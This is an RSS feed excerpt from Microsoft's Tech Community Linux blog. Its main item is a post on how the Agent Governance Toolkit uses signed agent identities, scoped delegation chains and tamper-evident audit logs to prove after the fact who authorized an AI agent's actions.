&lt;LI&gt;&lt;STRONG&gt;GitHub Copilot CLI:&lt;/STRONG&gt;&amp;nbsp;&lt;A class="lia-external-url" href="https://docs.github.com/en/copilot/how-tos/copilot-cli/set-up-copilot-cli/install-copilot-cli" target="_blank" rel="noopener"&gt;https://docs.github.com/en/copilot/how-tos/copilot-cli/set-up-copilot-cli/install-copilot-cli&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Azure endorsed Linux distributions:&lt;/STRONG&gt;&amp;nbsp;&lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/virtual-machines/linux/endorsed-distros" target="_blank" rel="noopener"&gt;https://learn.microsoft.com/en-us/azure/virtual-machines/linux/endorsed-distros&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;</description>
      <pubDate>Tue, 19 May 2026 18:25:43 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/agentic-ai-for-linux-operations-on-azure-the-prompts/ba-p/4520924</guid>
      <dc:creator>abbottkarl</dc:creator>
      <dc:date>2026-05-19T18:25:43Z</dc:date>
    </item>
    <item>
      <title>After the Agent Acts: Proving What Happened and Who Authorized It</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/after-the-agent-acts-proving-what-happened-and-who-authorized-it/ba-p/4519826</link>
      <description>&lt;P&gt;In &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/linuxandopensourceblog/agent-governance-toolkit-architecture-deep-dive-policy-engines-trust-and-sre-for/4510105" target="_blank" rel="noopener" data-lia-auto-title="part one" data-lia-auto-title-active="0"&gt;part one&lt;/A&gt; of this series, we covered AGT's runtime governance: the policy engine, zero-trust identity, execution sandboxing, and the OWASP Agentic AI risk mapping. In &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/linuxandopensourceblog/shift-left-governance-for-ai-agents-how-the-agent-governance-toolkit-helps-you-c/4516481" target="_blank" rel="noopener" data-lia-auto-title="part two" data-lia-auto-title-active="0"&gt;part two&lt;/A&gt;, we moved earlier in the lifecycle: shift-left governance, CI/CD gates, attestation workflows, and supply chain integrity.&lt;/P&gt;
&lt;P&gt;Both posts focused on governance that happens &lt;STRONG&gt;around the moment of action&lt;/STRONG&gt;, before it, during it, or right after it. That coverage is essential. But after those posts went live, a different pattern emerged in conversations with teams deploying agents in production. The question was more pointed:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;"An agent executed a financial transfer last Tuesday. A compliance officer is asking us to show who authorized it, through what chain, and exactly what scope it was granted. We have logs. But can we prove they weren't altered?"&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;No policy engine prevents a past action. No CI gate reconstructs a delegation chain after the fact. No shift-left tool tells an auditor whether the cryptographic identity that authorized a trade was legitimately derived from a human principal, or was injected mid-chain.&lt;/P&gt;
&lt;P&gt;This is the accountability gap. It is the governance question that neither runtime enforcement nor pre-runtime checks were designed to answer. Regulatory frameworks are tightening: the EU AI Act includes high-risk obligations with enforcement timelines in 2026, and the Colorado AI Act introduces requirements for automated decision-making. Courts are beginning to encounter AI agents in the evidentiary record. The accountability infrastructure has not caught up.&lt;/P&gt;
&lt;P&gt;This post covers what post-hoc accountability means for autonomous agents, what the Agent Governance Toolkit has to help address it, and three value propositions that are real but not yet visible in how governance tooling is typically described.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; The policy files, workflow configurations, and code samples in this post are illustrative examples designed to show the concepts. For working implementations, see the &lt;A class="lia-external-url" href="https://microsoft.github.io/agent-governance-toolkit/quickstart/" target="_blank" rel="noopener"&gt;QUICKSTART.md&lt;/A&gt; in the repository.&lt;/P&gt;
&lt;H2&gt;The Accountability Gap in Multi-Agent Systems&lt;/H2&gt;
&lt;P&gt;The accountability problem is architectural. When a single agent takes a single action, accountability is straightforward: you know which model ran, what prompt it received, and what it called. When agents delegate to sub-agents, which delegate further to tool-execution agents, the chain of authorization becomes progressively disconnected from the original human instruction that started it.&lt;/P&gt;
&lt;P&gt;Consider this delegation topology, common in any production orchestration scenario:&lt;/P&gt;
&lt;LI-CODE lang="markup"&gt;Human Principal
  └── Orchestrator Agent (did:mesh:orchestrator-001)
        └── Data Analyst Agent (did:mesh:analyst-001)
              └── File Write Tool (write /reports/q3-summary.csv)&lt;/LI-CODE&gt;
&lt;P&gt;By the time file_write fires, three delegation hops have occurred. The file write tool has no reliable way to know whether the human principal actually authorized file writes, what scope they granted to the orchestrator, or whether the analyst agent's instructions arrived through a legitimate delegation or were injected by a prompt injection attack.&lt;/P&gt;
&lt;P&gt;This gap has three concrete consequences:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Consequence&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Operational Impact&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Post-hoc audits cannot reconstruct authorization&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Incident investigations are limited to "the agent did this," not "here is who authorized this, through what chain, at what time, with what scope"&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Agents cannot distinguish legitimate delegation from injection&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;A prompt injection attack that inserts itself into a delegation chain is indistinguishable from a real orchestrator instruction without cryptographic verification&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Accountability cannot be attributed to a human authorization event&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;When a regulator asks "who is responsible for this action," the answer is a shrug and a log file&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;AGT already has the technical foundations designed to help close all three. The gap is not capability, it is visibility.&lt;/P&gt;
&lt;H2&gt;What AGT Has: The Cryptographic Accountability Stack&lt;/H2&gt;
&lt;P&gt;AGT's accountability infrastructure spans three components that work together: cryptographic agent identity, delegation chains, and tamper-evident audit logs.&lt;/P&gt;
&lt;H3&gt;1. Ed25519 Agent Identity with Lifecycle Management&lt;/H3&gt;
&lt;P&gt;Every agent in an AGT-governed system carries a cryptographic identity: a verifiable Ed25519 keypair with a W3C DID Document that can be exported, shared, and verified by any participant in the system.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agentmesh import AgentIdentity, IdentityRegistry

 # Create a verifiable agent identity
 identity = AgentIdentity.create(
     name="data-analyst",
     sponsor="operator@contoso.com",
     capabilities=["data.read", "report.write"],
     organization="data-team",
     description="Q3 close data analyst agent"
 )

 # Export as W3C DID Document for cross-system verification
 did_document = identity.to_did_document()

 # Register in the shared identity registry
 registry = IdentityRegistry()
 registry.register(identity)
&lt;/LI-CODE&gt;
&lt;P&gt;Identity lifecycle states, active, suspended, revoked, are tracked and cascaded. When an orchestrator identity is revoked, every downstream agent delegated from it is also invalidated. This cascade revocation behavior lets you kill a compromised delegation chain from its root rather than hunting sub-agents individually.&lt;/P&gt;
&lt;H3&gt;2. Delegation Chains with Scope Inheritance&lt;/H3&gt;
&lt;P&gt;When an orchestrator delegates to a sub-agent, AGT records the delegation cryptographically: who delegated, to whom, what capabilities were transferred, and what restrictions were applied. Sub-agents are designed to be unable to exceed the scope of their delegating principal.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from agentmesh import ScopeChain, DelegationLink

 # Create a scope chain rooted in a human sponsor
 chain, root_link = ScopeChain.create_root(
     sponsor_email="operator@contoso.com",
     root_agent_did=str(orchestrator_identity.did),
     capabilities=["data.read", "report.write", "data.delete"],
     sponsor_verified=True,
 )

 # Orchestrator delegates narrowed scope to analyst agent
 link = DelegationLink(
     link_id="link-analyst-001",
     depth=1,
     parent_did=str(orchestrator_identity.did),
     child_did=str(analyst_identity.did),
     parent_capabilities=["data.read", "report.write", "data.delete"],
     delegated_capabilities=["data.read", "report.write"],  # narrowed: no delete
     parent_signature=orchestrator_identity.sign(
         f"{orchestrator_identity.did}:{analyst_identity.did}:data.read,report.write".encode()
     ),
     link_hash="",  # computed on add
     previous_link_hash=root_link.link_hash,
 )
 link.link_hash = link.compute_hash()
 chain.add_link(link)

 # Verify the entire chain: scope narrowing + hash integrity + signatures
 valid, reason = chain.verify()
 if not valid:
     raise ValueError(f"Chain verification failed: {reason}")&lt;/LI-CODE&gt;
&lt;P&gt;The scope chain carries the human authorization context: the root sponsor email, when the chain was created, and what capabilities were granted at the top. Every downstream agent can trace any capability back through the chain using &lt;STRONG&gt;chain.trace_capability("data.read")&lt;/STRONG&gt;. A file write tool executing three hops from the human principal can verify that the original sponsor authorized file writes in this scope. This is the mechanism designed to help close the prompt injection gap: an injected instruction cannot produce a&amp;nbsp;valid signed delegation link from a legitimate orchestrator identity.&lt;/P&gt;
&lt;H3&gt;3. Tamper-Evident Audit Logs&lt;/H3&gt;
&lt;P&gt;Every policy decision, every delegation event, every tool call, every trust score evaluation: AGT writes a signed, append-only audit record. The signature covers the content hash of the log entry plus the hash of the preceding entry, forming a chain where tampering is designed to be detectable.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt; from agentmesh import PolicyEngine, AuditLog

 # Create the audit log (with optional external sink for production)
 audit_log = AuditLog()

 # Log a governance decision
 entry = audit_log.log(
     event_type="policy_decision",
     agent_did=str(analyst_identity.did),
     action="report.write",
     resource="/reports/q3-summary.csv",
     data={"task_id": "q3-close-2026"},
     outcome="success",
     policy_decision="allow",
 )

 # Verify the audit chain has not been tampered with
 valid, reason = audit_log.verify_chain()
 # valid == True: all hashes and chain links are intact

 # Query audit trail for a specific agent
 trail = audit_log.get_entries_for_agent(str(analyst_identity.did))&lt;/LI-CODE&gt;
&lt;P&gt;The audit trail for a single task session includes the complete delegation chain, from human authorization event at the top to tool execution at the bottom, with cryptographic signatures at every step.&lt;/P&gt;
&lt;H2&gt;Validating a Compliance Evidence Package&lt;/H2&gt;
&lt;P&gt;The three components above are most powerful when used together. At runtime, AGT's audit chain, identity registry, and delegation system each produce structured records. Assembling these into a single evidence package for compliance submission or incident investigation is a deployment-level concern: your CI pipeline or orchestration layer collects the outputs into a JSON artifact.&lt;/P&gt;
&lt;P&gt;Once assembled, AGT's &lt;STRONG&gt;agt verify --evidence&lt;/STRONG&gt; flag validates the package: checking that signatures are intact, delegation chains are complete, and audit entries have not been tampered with.&lt;/P&gt;
&lt;LI-CODE lang="powershell"&gt; # Validate a runtime evidence package
  agt verify --evidence ./agt-evidence.json

  # Strict mode: fail if evidence is missing, incomplete, or signatures don't verify
  agt verify --evidence ./agt-evidence.json --strict&lt;/LI-CODE&gt;
&lt;P&gt;Future direction: A built-in &lt;STRONG&gt;agt evidence collect&lt;/STRONG&gt; command to automate evidence assembly is on the backlog.&lt;/P&gt;
&lt;P&gt;The evidence package helps answer the audit questions directly:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Auditor Question&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Where It Lives in the Evidence Package&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Which agent executed this action?&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;identity.agent_id with Ed25519 public key&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Who authorized it?&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;delegation_chain[0].human_principal with timestamp&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;What scope was granted?&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;delegation_chain[*].granted_capabilities at each hop&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Was the delegation legitimate?&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;delegation_chain[*].signature, verifiable against issuer's public key&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Was the audit log altered?&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;audit_trail.chain_valid: true/false with entry-level hash verification&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;What policy governed the action?&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;policy_decision.rule_name with the policy YAML snapshot at decision time&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;This is the difference between "we have logs" and "here is a verifiable chain of custody backed by &lt;SPAN style="color: rgb(30, 30, 30);"&gt;cryptographic signatures."&lt;/SPAN&gt;&lt;/P&gt;
&lt;H2&gt;The Governance Dial: Enabling Autonomy, Not Just Blocking Risk&lt;/H2&gt;
&lt;P&gt;There is a framing problem in how agent governance is typically described. Governance is described almost entirely as a constraint: what agents cannot do, what gets blocked, what violations get caught. This framing is accurate but incomplete.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Governance is the mechanism that helps you safely expand what your agents can do.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;Without governance evidence, every expansion of agent autonomy is a leap of faith. With it, expansions are decisions with a measured risk profile:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Scenario&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Without Governance Evidence&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;With AGT Accountability Stack&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Expand agent to write to production databases&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Requires human approval on every write indefinitely&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Pilot with human-in-loop for 500 writes; audit trail shows 0 violations; graduate to autonomous&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Deploy agent in a regulated data environment&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Blocked by legal until "we can prove it"&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Evidence package helps satisfy audit requirement; deployment proceeds&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Respond to a security incident involving an agent&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Manually reconstruct what happened from scattered logs&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Pull the task session's evidence package; full chain of custody in minutes&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;The governance layer is the dial between supervised and autonomous operation. Audit evidence is what helps justify turning the dial further in the autonomous direction.&lt;/P&gt;
&lt;H2&gt;Blast Radius: The Governance Assurance You're Not Advertising&lt;/H2&gt;
&lt;P&gt;The sandboxing and privilege ring system in AGT is typically described in security terms: isolation, privilege reduction, process-level enforcement. But there is a more concrete operational value: &lt;STRONG&gt;blast radius definition before an incident occurs&lt;/STRONG&gt;.&lt;/P&gt;
&lt;P&gt;The question every operations team needs to answer before deploying an autonomous agent at scale is:&lt;/P&gt;
&lt;P&gt;*"If this agent goes wrong, not if, when, what is the worst-case outcome?"*&lt;/P&gt;
&lt;P&gt;Without governance-enforced privilege boundaries, the answer is uncomfortably open-ended. With AGT's capability model and execution rings, the blast radius is a policy configuration: a bounded, declared set of resources the agent can touch, scoped to what the task requires.&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;# policies/financial-agent.yaml
apiVersion: governance.toolkit/v1
version: "1.0"
name: financial-agent-policy
default_action: deny

rules:
  - name: allow-report-write
    condition: "tool_name == 'report.write' and path.startswith('/data/reports/')"
    action: allow
    priority: 10
  - name: allow-data-read
    condition: "tool_name == 'data.read' and path.startswith('/data/processed/')"
    action: allow
    priority: 10&lt;/LI-CODE&gt;
&lt;P&gt;With this policy in place, the worst-case outcome for this agent is declared in the policy file, not discovered during a post-incident review. The audit log records not just what the agent did, but also every action that was blocked, giving you a full picture of how close any session came to the declared blast boundary.&lt;/P&gt;
&lt;H2&gt;Regulatory Alignment&lt;/H2&gt;
&lt;P&gt;The OWASP-COMPLIANCE.md in the AGT repository maps the toolkit's controls to each of the 10 OWASP Agentic AI risks. The compliance picture for specific regulatory frameworks:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Regulatory Requirement&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Relevant Framework&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;AGT Control&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Technical documentation for high-risk AI&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;EU AI Act, Art. 9-11&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Evidence package, policy audit trail, OWASP attestation&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Logging for automated decisions&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;EU AI Act, Art. 12&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Tamper-evident audit log with entry-level signatures&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Human oversight mechanisms&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;EU AI Act, Art. 14&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Circuit breakers, privilege rings, delegation scope limits&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Algorithmic impact assessment&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Colorado AI Act&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Policy snapshot at decision time, signed governance evidence&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Audit trail for automated decisions&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;HIPAA, SOC 2 Type II&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Immutable audit log with W3C DID-based agent identity&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Non-repudiation of agent actions&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Financial services (MiFID II, SEC)&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Ed25519-signed audit entries, delegation chain with human auth context&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&lt;STRONG&gt;Note:&lt;/STRONG&gt; The Agent Governance Toolkit does not guarantee compliance with any specific regulatory framework. The mappings above show how the toolkit's controls align with common requirements. Consult legal counsel for your specific obligations.&lt;/P&gt;
&lt;H2&gt;Putting It Together&lt;/H2&gt;
&lt;P&gt;The three posts in this series cover three distinct layers of the governance lifecycle:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Layer&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Timing&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Primary Value&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Post&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Shift-left governance&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Before production&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Catch policy violations at commit, PR, and CI time&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/linuxandopensourceblog/shift-left-governance-for-ai-agents-how-the-agent-governance-toolkit-helps-you-c/4516481" target="_blank" rel="noopener" data-lia-auto-title="Part 2" data-lia-auto-title-active="0"&gt;Part 2&lt;/A&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Runtime governance&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;At the moment of action&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Deterministic policy enforcement, zero-trust identity, sandboxing&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/linuxandopensourceblog/agent-governance-toolkit-architecture-deep-dive-policy-engines-trust-and-sre-for/4510105" target="_blank" rel="noopener" data-lia-auto-title="Part 1" data-lia-auto-title-active="0"&gt;Part 1&lt;/A&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;Post-hoc accountability&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;After the action&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Cryptographic chain of custody, blast radius evidence, regulatory proof&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;This post&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;None of these layers substitutes for the others. Pre-runtime governance cannot prevent a runtime violation. Runtime enforcement cannot retroactively prove authorization. Post-hoc accountability cannot undo an action that runtime governance should have blocked. They compose.&lt;/P&gt;
&lt;H2&gt;Getting Started&lt;/H2&gt;
&lt;P&gt;If you already have the AGT policy engine in place, the path to full accountability coverage is incremental:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;&lt;STRONG&gt;Add agent identity&lt;/STRONG&gt; - Create identities for each agent and register them. Export DID documents for cross-service verification.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Record delegation tokens&lt;/STRONG&gt; - At each orchestrator-to-agent delegation boundary, create and sign a delegation link. Pass tokens as context to the policy engine.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Configure a tamper-evident audit backend&lt;/STRONG&gt; - Configure the audit chain with a signing key and chain verification. For production, use an immutable backend: Azure Blob with WORM retention, S3 Object Lock, or equivalent.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Generate your first evidence package&lt;/STRONG&gt;:&lt;/LI&gt;
&lt;/OL&gt;
&lt;LI-CODE lang="powershell"&gt;agt verify --evidence ./agt-evidence.json --strict&lt;/LI-CODE&gt;
&lt;OL start="5"&gt;
&lt;LI&gt;&lt;STRONG&gt;Add evidence generation to your CI/CD release gate&lt;/STRONG&gt;:&lt;/LI&gt;
&lt;/OL&gt;
&lt;LI-CODE lang=""&gt;# .github/workflows/release.yml
- name: Governance Evidence Gate
  uses: microsoft/agent-governance-toolkit/action@&amp;lt;sha&amp;gt; #v3.5.0
  with:
    command: governance-verify
    evidence-path: ./agt-evidence.json
    strict: true
    fail-on-missing-chain: true&lt;/LI-CODE&gt;
&lt;H2&gt;Conclusion&lt;/H2&gt;
&lt;P&gt;Runtime governance and shift-left governance answer the question:&amp;nbsp;&lt;STRONG&gt;did we apply the right controls?&lt;/STRONG&gt; Post-hoc accountability answers the question: &lt;STRONG&gt;can we prove it?&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;The Agent Governance Toolkit has the technical infrastructure designed to help answer it: Ed25519 agent identity with cascade revocation, cryptographically signed delegation chains with human authorization context, and tamper-evident audit logs that form a verifiable chain of custody from human principal to terminal tool call.&lt;/P&gt;
&lt;P&gt;The governance dial analogy is worth keeping. Every autonomous agent deployment exists on a spectrum between fully supervised and fully autonomous. The limiting factor on where you can set that dial is not model capability or framework maturity. It is how much governance evidence you have, and how verifiable that evidence is.&lt;/P&gt;
&lt;H2&gt;Resources&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;GitHub&lt;/STRONG&gt;: &lt;A href="https://github.com/microsoft/agent-governance-toolkit" target="_blank"&gt;microsoft/agent-governance-toolkit: AI Agent Governance Toolkit — Policy enforcement, zero-trust identity, execution sandboxing, and reliability engineering for autonomous AI agents. Covers 10/10 OWASP Agentic Top 10.&lt;/A&gt;&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Quickstart&lt;/STRONG&gt;: &lt;A href="https://microsoft.github.io/agent-governance-toolkit/quickstart/" target="_blank"&gt;Quick Start - Agent Governance Toolkit&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;OWASP Compliance Mapping&lt;/STRONG&gt;: &lt;A href="https://microsoft.github.io/agent-governance-toolkit/security/owasp-compliance/" target="_blank"&gt;OWASP Compliance - Agent Governance Toolkit&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;PyPI&lt;/STRONG&gt;: pip install agent-governance-toolkit[full]&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;npm&lt;/STRONG&gt;: npm install &lt;a href="javascript:void(0)" data-lia-user-mentions="" data-lia-user-uid="2865264" data-lia-user-login="microsoft" class="lia-mention lia-mention-user"&gt;microsoft​&lt;/a&gt;/agent-governance-sdk&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;NuGet&lt;/STRONG&gt;: dotnet add package Microsoft.AgentGovernance&lt;/LI&gt;
&lt;/UL&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;Have questions about deploying AGT in your environment? Open an issue at aka.ms/agent-governance-toolkit or join the conversation in the comments below.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;</description>
      <pubDate>Thu, 14 May 2026 22:28:12 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/after-the-agent-acts-proving-what-happened-and-who-authorized-it/ba-p/4519826</guid>
      <dc:creator>mosiddi</dc:creator>
      <dc:date>2026-05-14T22:28:12Z</dc:date>
    </item>
    <item>
      <title>Decoupling Memory from Startup Time in AKS Sandbox Pods</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/decoupling-memory-from-startup-time-in-aks-sandbox-pods/ba-p/4516307</link>
      <description>&lt;P&gt;&lt;EM&gt;What if a 96GB sandboxed pod could start as fast as a 2GB one?&lt;/EM&gt;&lt;/P&gt;
